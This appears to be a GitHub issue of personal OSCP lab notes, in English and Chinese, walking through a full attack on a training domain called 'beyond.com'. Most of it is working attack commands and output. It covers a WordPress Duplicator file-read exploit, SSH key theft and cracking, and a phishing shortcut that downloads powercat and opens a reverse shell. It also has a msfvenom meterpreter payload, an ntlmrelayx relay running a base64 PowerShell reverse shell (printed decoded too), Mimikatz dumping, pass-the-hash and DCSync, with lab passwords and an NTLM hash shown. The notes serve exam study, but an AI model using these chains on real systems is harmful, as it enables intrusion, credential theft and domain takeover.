Open WDavid404 opened 7 months ago
Environment:There are two servers (MAILSRV1 and MAILSRV1) on the public network connecting with our Kali.
Port scan for servers one by one.
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
## -oN to create an output file containing the scan results.
## -sC to use Nmap's default scripts
check hMailServer on CVE ==> no useful info
Next, let's enumerate the IIS web server. First, we'll browse the web page. Let's try to identify directories and files by using gobuster
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
==> no useful info
Tools:
nmap -sV -sC -o mailsrv1.txt 192.168.188.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:01 EST
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd ==> hMailServer!
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0 ==> Noted!
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: QUOTA ACL RIGHTS=texkA0001 IMAP4rev1 IDLE completed CAPABILITY IMAP4 OK CHILDREN NAMESPACE SORT
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
2160/tcp filtered apc-2160
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-29T12:03:01
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.29 seconds
==> Search hMailserver on CVE https://www.cvedetails.com/vulnerability-list/vendor_id-8442/product_id-14780/Hmailserver-Hmailserver.html
nmap -sV -sC -o websvr1.txt 192.168.188.244
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:07 EST
Nmap scan report for 192.168.188.244
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_ 256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.0.2
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.188.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1121/tcp filtered rmpp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
==>. View page source ---> It use wordpress
wpscan --url http://192.168.188.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
cat websrv1_wpscan|grep -i "The version is out of date" -B4
用searchexploit依次查找这些plugin,发现只有duplicator 和 Elementor存在可利用的exploit模块 ![image](https://github.com/WDavid404/OSCP/assets/137129330/36335f3d-ba61-46d0-add1-5a7dc5ab995
用 searchsploit -x <module名> 来查看具体的内容,发现还是duplicator的exploit好用 使用50420.py:
searchsploit -m 50420.py
python3 50420.py http://192.168.188.244 /etc/passwd
==>可以work,并发现daniela和marcus两个user
#取得用户的id_rsa (/home/<user>/.ssh/id_rsa)
python3 50420.py http://192.168.188.244 /home/daniela/.ssh/id_rsa
==> copy到本地文件id_rsa里 (别忘了设定permission:chmod 600 id_rsa)
利用id_rsa文件尝试ssh登陆websvr1
ssh -i ./id_rsa daniela@192.168.188.244
Enter passphrase for key './id_rsa':
==》 破解ssh的passphrase。 https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
# 破解结果出来: tequieromucho
利用破解结果,ssh login成功!
daniela@websrv1:~$ ip a
发现这个服务器没有连接内网
在WEBSVR1里,用linPEAS.sh 工具自动搜索 linPEAS.sh工具 (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
WEBSERV1里用 daniela@websrv1:~$ wget -qc http://192.168.45.204:9000/linpeas.sh
从Kali下载
然后
daniela@websrv1:~$ chmod a+x ./linpeas.sh
daniela@websrv1:~$ ./linpeas.sh
关注里面的几个信息:
利用上面“Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d”信息,进行privilege escalation 获得root权限后, let's search the Git repository for sensitive information first.
root@websrv1:/home/daniela# cd /srv/www/wordpress/
root@websrv1:/srv/www/wordpress# git status
HEAD detached at 612ff57
nothing to commit, working tree clean
root@websrv1:/srv/www/wordpress# git log
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD -> master)
Author: root <root@websrv1>
Date: Tue Sep 27 14:26:15 2022 +0000
Removed staging script and internal network access
commit f82147bb0877fa6b5d8e80cf33da7b8f757d11dd
Author: root <root@websrv1>
Date: Tue Sep 27 14:24:28 2022 +0000
initial commit
root@websrv1:/srv/www/wordpress# git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
==》 收集到了jon的credentials信息
crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success
==》MAILSRV1 is a domain-joined machine and we have identified a valid set of domain credentials for jon
This provides us with two options:
we can prepare a malicious attachment and send a phishing email as john to daniela and marcus.
尝试第一个办法
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
---》 No useful info
所以,只好采用第2种办法:send a phishing email as john to daniela and marcus.
kali@kali:~$ mkdir /home/kali/beyond/webdav
kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
血泪教训: webdav的端口必须用80,否则后面动作会不成功!
2. 登陆一台WindowsPC来制作Windows Lib文件(config.Library-ms)和shortcut文件
Connect WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.
<?xml version="1.0" encoding="UTF-8"?>
注意:config.Library-ms文件保存到kali后里面内容会变,要注意手动恢复回来。
在WinPC的桌面上新建一个shortcut(名字为configuration等都可以)
shorcut内容指定为如下,然后把shorcut拷贝到Kali的webdav里(双击config文件,也就指向了webdav目录里)
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
--》即将会从kali的9000 port(对应http.server的port)里下载一个powercat.ps文件并通过执行它向kali的4444 port发送reverse shell信息
在Kali上准备好
- webdav目录下放置powercat.ps1 文件(/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_血泪注意: 网上下载的powercat.ps1不好用,还是在kali里搜索吧: find / -name powercat.ps1 2>/dev/null_
- 在webdav目录里 python3 -m http.server 9000
- nc -lvp 4444
- body.txt文件,内容任意。
then,
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john Password: dqsTwTpZPn#nL === Trying 192.168.50.242:25... === Connected to 192.168.50.242. <- 220 MAILSRV1 ESMTP -> EHLO kali <- 250-MAILSRV1 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> am9obg== <- 334 UGFzc3dvcmQ6 -> ZHFzVHdUcFpQbiNuTA== <- 235 authenticated. -> MAIL FROM:john@beyond.com <- 250 OK -> RCPT TO:marcus@beyond.com <- 250 OK -> DATA <- 354 OK, send. -> 36 lines sent <- 250 Queued (1.088 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.
nc上会收到一个internal pc(CLIENTWK1)来的reverse shell (IP:172.16.74.243)
### scan CLIENTWK1 by winPEAS
kali上准备一个winpeas.exe文件 (下载网址: https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b
--》 下载winPEASx64.exe)
PS C:\Windows\System32\WindowsPowerShell\v1.0> cd C:\Users\marcus PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/winPEASx64.exe -Outfile winPEAS.exe PS C:\Users\marcus> .\winPEAS.exe .\winPEAS.exe ...
查看下面信息:
- AV Information (是否有AV在动作)
- Network Ifaces and known hosts
- DNS cached
### scan CLIENTWK1 by Sharphound
Kali机器上: cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
CLIENTWK1机器上:
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/SharpHound.ps1 -Outfile SharpHound.ps1 PS C:\Users\marcus> powershell -ep bypass PS C:\Users\marcus> . .\SharpHound.ps1 PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All
分析结果,得知下面的info
1.
![image](https://github.com/WDavid404/OSCP/assets/137129330/3706e113-d721-49bf-a395-67841f12f4a9)
2. The SPN for daniela is http/internalsrv1.beyond.com
3. A domain administrator:beccy and beccy has an active session on MAILSRV1
Then,set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec in order to identify accessible services, open ports, and SMB settings.
`kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=443 -f exe -o met.exe
`
start a multi/handler listener with the corresponding settings in Metasploit.
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.204 LHOST => 192.168.119.5
msf6 exploit(multi/handler) > set LPORT 443 LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false -->It specifies that the listener stays active for new sessions without the need to restart it for every incoming session. ExitOnSession => false
msf6 exploit(multi/handler) > run -j [*] Exploit running as background job 0.
on CLIENTWK1.
PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe PS C:\Users\marcus> .\met.exe
In Metasploit, a new session should appear:
`[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400`
Once session 1 is opened, we can use multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy to access the internal network
msf6 exploit(multi/handler) > use multi/manage/autoroute msf6 post(multi/manage/autoroute) > set session 1 session => 1 msf6 post(multi/manage/autoroute) > run .. msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf6 auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf6 auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 2.
确认SOCKS5配置如下
kali@kali:~/beyond$ cat /etc/proxychains4.conf ... socks5 127.0.0.1 1080
对内网机器进行扫描 用crackmapexec
`kali@kali:~/beyond$ proxychains -q crackmapexec smb 172.16.74.240-241 172.16.74.244 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares`
结果:
1. john doesn't have actionable or interesting permissions on any of the discovered shares
2. MAILSRV1 and INTERNALSRV1 have SMB signing set to False --》 Without this security mechanism enabled, we can potentially perform relay attacks if we can force an authentication request.
对内网机器进行扫描 用nmap (注意:只能用-sT)
`kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.74.240 172.16.74.241 172.16.74.243`
==》 172.16.74.241 有80,443 port
使用Chisel访问172.16.74.241的80 port web server
use Chisel in server mode to receive incoming connections on port 8080.
下载chisel到目前目录 (https://github.com/jpillora/chisel/releases/tag/v1.9.1,下载windows amd64那个 和 linux的) 对于linux版本的chisel kali@kali:~/beyond$ chmod a+x chisel kali@kali:~/beyond$./chisel server -p 8080 --reverse
上传windows版本的chisel.exe to CLIENTWK1 by using Meterpreter's upload command.
msf6 auxiliary(server/socks_proxy) > sessions -i 1 [*] Starting interaction with 1... meterpreter > upload chisel.exe C:\Users\marcus\chisel.exe
Now, we can enter shell and utilize Chisel in client mode to connect back to our Kali machine on port 8080.
`C:\Users\marcus> chisel.exe client 192.168.45.204:8080 R:80:172.16.74.241:80
注意:Kali上关闭webdav server因为它在用着80 port
`
这样,在Kali上可以用浏览器访问127.0.0.1从而打开172.16.74.241的web page
为了访问http://127.0.0.1/wordpress/wp-admin , 需要修改下面的config
kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
...
127.0.0.1 internalsrv1.beyond.com 《---这个
...
在http://127.0.0.1/wordpress/wp-admin 页面上,可以用daniela的credentail登陆
### 获得daniela的credentials info
`kali@kali:~/beyond$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john`
--》 获得daniela的hash
破解之得到daniela的密码DANIelaRO123
`kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force`
用daniela:DANIelaRO123 登陆 http://127.0.0.1/wordpress/wp-admin
进入wordpress的plugin页面
点击“Backup Migration”的“manage”
kali上启动下面command
kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.188.242 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0ACIALAA0ADQANAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
上面对应的one-line command原文是
$client = New-Object System.Net.Sockets.TCPClient("192.168.45.204",4448);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
kali上启动 nc -vlpn 4448 等待接收reverse shell
wordpress的backup migration plugin页面里,输入//192.168.45.204/test (注意:test目录在kali上不需要实际存在) 然后点击save按钮
---》 从而 nc -vlpn 4448 可以进入MAILSVR1的shell里
PS C:\Windows\system32> cd C:\Users\Administrator
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\Administrator> .\met.exe
In Kali Metasploit, we should receive a new incoming session.
[*] Sending stage (200774 bytes) to 192.168.50.242
[*] Meterpreter session 2 opened (192.168.119.5:443 -> 192.168.50.242:50814)
msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator> powershell
Next, we'll download the current Mimikatz version on Kali and serve it via our Python3 web server on port 8000. On MAILSRV1, we'll download Mimikatz with iwr and launch it. mimikatz获取位置:/usr/share/windows-resources/mimikatz/x64/mimikatz.exe (版本是 mimikatz 2.2.0 (x64) #19041) ⚠️ 别从github里下载mimikatz,sekurlsa::logonpasswords时会报错 ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
PS C:\Users\Administrator>iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
注意:如果被告诉iwr命令无法识别,要注意是否已经启动了powershell。iwr是powershell里的command
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
==》 获得beccy的NTLM和password信息
注意:
在 MAILSVR上执行 mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator 是取不到信息的
--》 因为现在login MAILSVR的daniela不是domain administration用户
kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.74.240
进入DC后通过iwr传输mimikatz (最好先传输met.exe, 然后在metasploit上操作),
powershell
iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator
## For fun,
## `lsadump::dcsync /domain:beyond.com /user:Administrator /all` will dump all domain user NTLM||